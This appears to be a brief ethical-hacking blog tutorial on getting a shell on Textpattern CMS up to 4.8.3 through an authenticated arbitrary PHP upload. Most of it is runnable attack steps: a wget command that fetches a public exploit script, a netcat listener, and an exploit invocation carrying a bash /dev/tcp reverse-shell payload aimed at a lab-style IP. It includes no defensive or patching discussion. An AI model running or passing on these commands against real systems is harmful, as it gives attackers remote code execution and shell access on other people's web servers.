How to upload a shell in Textpattern <= 4.8

Textpattern <= 4.8 Remote Code Execution

TexTpattern CMS until version 4.8.3 allows authenticated users to upload any PHP file.

  • You’ll need to download the exploit using:

wget https://github.com/ricardojoserf/textpattern-exploit-rce/raw/main/exploit.py

  • set up a listener : nc -nlvp 2222

now everything’s ready and we’re ready to fire the script.

python3 exploit.py -t "http://10.10.10.157/" -u USER -p PASSWORD -d -c "/bin/bash -i >& /dev/tcp/IP/2222 0>&1"

Comments are closed, but trackbacks and pingbacks are open.

SignupSubscribe to our newsletter to get the latest ethical hacking & penetration testing tutorials & resources.

Subscribe to our newsletter to get the latest ethical hacking & penetration testing tutorials & resources.